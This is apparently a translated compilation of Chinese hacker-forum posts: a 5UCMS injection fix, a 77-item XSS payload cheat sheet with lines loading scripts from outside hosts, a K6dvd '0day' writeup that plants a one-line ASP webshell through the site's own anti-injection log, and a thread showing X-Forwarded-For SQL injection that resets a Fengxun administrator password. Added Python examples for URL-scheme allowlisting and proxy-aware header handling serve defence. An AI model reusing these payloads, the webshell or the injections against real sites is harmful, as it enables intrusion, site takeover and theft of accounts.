Find Call DB("Update [{pre}Content] Set [Views]=[Views]+1 Where [ID]=" & ID,0) and change it to Call DB("Update [{pre}Content] Set [Views]=[Views]+1 Where [ID]=" & clng(ID),0)
5uCMS users, please update your site code following the steps above; a patch will be built and released on the 11th of March
XSS cross-site scripting attack collection
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Corrected defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('X SS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are mostly useless domestically because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute with a broken-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) ActionScript inside Flash can smuggle your XSS code in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace; the HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
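Vectors 3 to 15, 17 and 19 above are one payload, a javascript: URL, dressed up for a naive filter with mixed case, HTML character references, embedded tabs, newlines and nulls, and leading whitespace. The check below is an added example, not code from the cheat sheet's source: it decodes an attribute value the way a browser does and then allowlists the scheme, instead of searching for the literal word. The allowed-scheme set and the ignored-character set are my own choices. It does not address the host-obfuscation vectors 68 to 77, which need host canonicalisation rather than scheme checks.

```python
"""Rejecting script URLs in user-supplied link and image attributes
(added example; not code from the cheat sheet's source).

A filter that looks for the text "javascript:" loses to every disguise in
the list above. The browser's own normalisation is the thing to copy:
decode character references, drop the control characters it ignores, trim
whitespace, and only then look at the scheme.
"""
import html
import re
from urllib.parse import urlsplit

# Browsers discard ASCII control characters (tab, LF, CR, NUL and the rest
# of the C0 range) from a URL before they look at the scheme and trim
# surrounding whitespace. The set is my choice; it covers vectors 11-15,
# 17 and 19.
_IGNORED = re.compile(r"[\x00-\x1f\x7f]")

# Schemes a link or image reference is allowed to use (assumed policy).
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def canonical_url(value: str) -> str:
    """Undo the disguises before deciding anything: decode HTML character
    references until the text stops changing (handles double encoding and
    references with or without semicolons), then drop ignored characters
    and outer whitespace."""
    decoded = value
    while True:
        again = html.unescape(decoded)
        if again == decoded:
            break
        decoded = again
    return _IGNORED.sub("", decoded).strip()


def url_scheme(value: str) -> str:
    """Lower-cased scheme of the canonical form; '' for a relative URL."""
    return urlsplit(canonical_url(value)).scheme.lower()


def is_safe_link(value: str) -> bool:
    """Allow relative URLs and absolute URLs whose scheme is on the
    allowlist; every spelling of javascript:, vbscript: or data: fails."""
    url = canonical_url(value)
    if not url:
        return False
    scheme = urlsplit(url).scheme.lower()
    if scheme == "":
        return True  # relative, or scheme-relative "//host/..."
    return scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    samples = [
        "http://www.google.com./",
        "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS');",
        "&#106;avascript:alert('XSS')",
        "java\x00script:alert('XSS')",
    ]
    for s in samples:
        print(f"{s!r:40} -> {'allow' if is_safe_link(s) else 'block'}")
```

Scheme allowlisting only protects attributes that take a URL; the STYLE, expression() and event-handler vectors in the list need the attribute itself to be refused or the HTML to be rebuilt from a tag/attribute allowlist.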
K6dvd music site 0day (the embarrassment of anti-injection)
It has been a long time since I looked at code~ and before publishing this I believe many seniors already know about this bug!! PS: I had never found it myself; maybe I have just been away from the scene for too long! Heh~~
The K6dvd video system is a fairly good domestic music publishing and management system!
Today 鱼 asked me to publish some penetration articles this week for the 黑客吧 (Hacker Bar) community to share!~ I meant to refuse, since I have not done penetration work for a while and had nothing to write about! But I still flipped through some sites at random to see whether I could produce a beginner-level penetration article...
Found a music publishing site, so that is the one! I will not write the URL; the goal is not the penetration itself~ heh!
Picked a URL with a parameter at random and submitted a ' which returned the following:
Right, an anti-injection system! Most people who do penetration work will have seen one~
非法操作!系统做了如下记录↓
操作IP:xxx.xxx.xxx.xx
操作时间:2009-5-28 19:33:47
操作页面:/yxplay.asp
提交方式:GET
提交参数:id
提交数据:109446'
Heh, it even logs the IP~~
I casually tried some ordinary penetration ideas~ with the anti-injection system in the way it went badly! So I downloaded a copy of this site's music source code to see whether I could dig out a 0day~ and that is how this article came about!!
First look at the anti-injection system from earlier. It lives in conn.asp and sql.asp; part of it follows:
dim dbkillSql,killSqlconn,connkillSql
dbkillSql="data/#sql.asp"
'On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
It creates a database connection!
'-------- POST section ------------------
If Request.Form<>"" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
                If WriteSql=True Then
                    killSqlconn.Execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
                    killSqlconn.close
                    Set killSqlconn = Nothing
                End If
                Response.Write "<Script Language=JavaScript>alert('快乐视听娱乐网提示你,请不要给本站提交任何非法字符或参数尝试注入!');</Script>"
                Response.Write "非法操作!系统做了如下记录↓<br>"
                Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "操作时间:"&Now&"<br>"
                Response.Write "操作页面:"&Request.ServerVariables("URL")&"<br>"
                Response.Write "提交方式:POST<br>"
                Response.Write "提交参数:"&Fy_Post&"<br>"
                Response.Write "提交数据:"&Request.Form(Fy_Post)
                Response.End
            End If
Right, that is the alert error message from before!
Look closely and there is an interesting fellow: killSqlconn.Execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
This is the normal logging of the IP, the action type, what the injector submitted, and so on!! Now look at the Server.CreateObject("ADODB.Connection") above: the database file is actually an ASP file... So if we submit ' <%execute(request("wooden"))%> wouldn't that write a one-liner trojan into #sql.asp for us? Don't get excited too soon; look at this:
' custom list of strings to filter, separated by "|"
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
The fy_in parameter enumerates the keywords that submissions are checked for! If the content we submit contains any of these keywords, it never makes it into the database!
For anyone who knows regular expressions this is no problem at all for a JS expert. After repeated tweaking! A one-liner trojan that slips past every check above was finally born~ only it is eval - - sigh, none of the thrill of an execute error!
<script runat=server language=vbscript>eval request(chr(35))</script>
Usage: append and =><script runat=server language=vbscript>eval request(chr(35))</script> to any URL parameter
Then visit data/%23sql.asp and the one-liner trojan runs:
OK, the 0day is out; everyone can go and have fun, but remember: don't do damage! Especially the drive-by-download crowd, shame on you~
Question about forging HTTP_X_FORWARDED_FOR
http://www.t00ls.net/thread-15177-1-1.html
I am slow; on the question of forging HTTP_X_FORWARDED_FOR I read material for half a day with the help of Baidu and Google and still do not get it, so I am asking here...
Suppose the following is a packet capture of a normal backend login:
POST /admin/login.asp?action=login HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1:99/admin/login.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1:99
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: EDiaryEditor_RUser=1324481743; rtime=0; ltime=1298481309656; cnzz_eid=19758319-1298478159-; AJSTAT_ok_times=1; TENATTQRLEFVOIAJDEKD=MQAAEQCFLLKKNYKKUTOOYJMBVTKWIHXKIHAZRJOR
name=123123312&pass=1232123&code=7XYZ&Submit=%B5%C7+%C2%BC
In here, how do I construct HTTP_X_FORWARDED_FOR so as to produce an injection?
=============
Also attached, an analysis of a Fengxun (风讯) 4.0 injection found online:
The injectable file is Vote/Vote_Ajax.asp; lines 48-53 are as follows.
VisitIP = request.ServerVariables("HTTP_X_FORWARDED_FOR")
If VisitIP = "" then
    VisitIP = request.ServerVariables("REMOTE_ADDR")
End If
' if VisitIP is not empty, the HTTP_X_FORWARDED_FOR value goes straight into the database query
Set VS_RS = Conn.Execute("Select top 1 VoteTime from FS_VS_Items_Result where TID = "&TID&" and VoteIp='"&VisitIP&"' order by RID desc")
' this clearly creates an injection condition
For the injection in this file we simply forge the value. To forge the HTTP_X_FORWARDED_FOR variable, we only need to capture the packet with NC, modify the captured data accordingly and resubmit it.
The injection statement for this vulnerability: 127.0.0.1');update FS_MF_Admin set Admin_Pass_Word='49ba59abbe56e057' where id=2-- . Once it is submitted successfully, the password of the administrator with ID 2 has been changed to 123456.
Here, "modify the captured data accordingly and resubmit it" means modifying the HTTP_X_FORWARDED_FOR variable in the packet, but the normal capture shows no HTTP_X_FORWARDED_FOR variable at all.
My question is: do I need to add an extra line for the HTTP_X_FORWARDED_FOR injection to the packet?
How do I add it, or carry out the injection?
For example, how would the Fengxun 4.0 injection above be constructed?
=====================
Just add x-forwarded-for to the request headers, e.g.:
POST /admin/login.asp?action=login HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1:99/admin/login.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1:99
x-forwarded-for: aa' or ''='
name=123123312&pass=1232123&code=7XYZ&Submit=%B5%C7+%C2%BC
BY toby57
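The reply's point, that X-Forwarded-For is just another request header the client writes, is also the defence: an application must only believe a hop its own reverse proxy appended, must validate that hop as an IP address, and must bind the value as a query parameter rather than splice it into SQL as the Fengxun Vote_Ajax.asp excerpt does (the same idea as the clng() casts in the 5UCMS advisory above, applied to a string). The Python below is an added example, not code from Fengxun or from the thread; the trusted-proxy address, the table layout and the sample rows are constructed for the demonstration, and sqlite3 stands in for the real database.

```python
"""Trusting X-Forwarded-For only as far as it deserves, and never splicing
it into SQL (added example; not Fengxun or forum code).
"""
import ipaddress
import sqlite3
from typing import Optional

# Addresses of the reverse proxies this application is deployed behind
# (assumed value for the demonstration).
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Resolve the real client address.

    A direct connection (peer is not one of our proxies) gets the socket
    address and the header is ignored entirely: whatever it says, the
    client wrote it. Behind a trusted proxy, walk the chain from the right,
    skip our own proxies, and take the first remaining hop, which the proxy
    appended from the socket it saw. A hop that is not an IP literal means
    the chain is not what our proxy produces, so fail closed (ValueError)
    rather than guess.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return str(peer)
    for hop in reversed([h.strip() for h in xff_header.split(",")]):
        addr = ipaddress.ip_address(hop)  # raises ValueError on "aa' or ''='"
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)


def vote_time_for_ip(conn: sqlite3.Connection, tid: int, ip: str) -> Optional[str]:
    """The Vote_Ajax.asp query with bound parameters instead of concatenation."""
    row = conn.execute(
        "SELECT VoteTime FROM FS_VS_Items_Result WHERE TID = ? AND VoteIp = ? "
        "ORDER BY RID DESC LIMIT 1",
        (int(tid), ip),
    ).fetchone()
    return row[0] if row else None


def last_vote_time(conn, tid, remote_addr, xff_header):
    """What the vote endpoint should do: resolve the client, then query."""
    return vote_time_for_ip(conn, tid, client_ip(remote_addr, xff_header))


def demo_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE FS_VS_Items_Result ("
        "RID INTEGER PRIMARY KEY, TID INTEGER, VoteIp TEXT, VoteTime TEXT)"
    )
    conn.executemany(
        "INSERT INTO FS_VS_Items_Result (TID, VoteIp, VoteTime) VALUES (?, ?, ?)",
        [(1, "203.0.113.7", "2011-03-16 15:57"), (1, "198.51.100.2", "2011-03-16 16:20")],
    )
    return conn


if __name__ == "__main__":
    db = demo_db()
    # Direct connection: the spoofed header is ignored, only the peer counts.
    print(last_vote_time(db, 1, "203.0.113.7", "aa' or ''='"))
    # Behind the proxy: the rightmost hop is the one the proxy appended.
    print(last_vote_time(db, 1, "10.0.0.5", "aa' or ''='', 198.51.100.2"))
    # The payload bound as a parameter is just a string that matches nothing.
    print(vote_time_for_ip(db, 1, "aa' or ''='"))
```

Even with the parameter bound, the header is only meaningful when the proxy that appends it is the one you configured; on a host exposed directly to the Internet, REMOTE_ADDR is the only value worth storing.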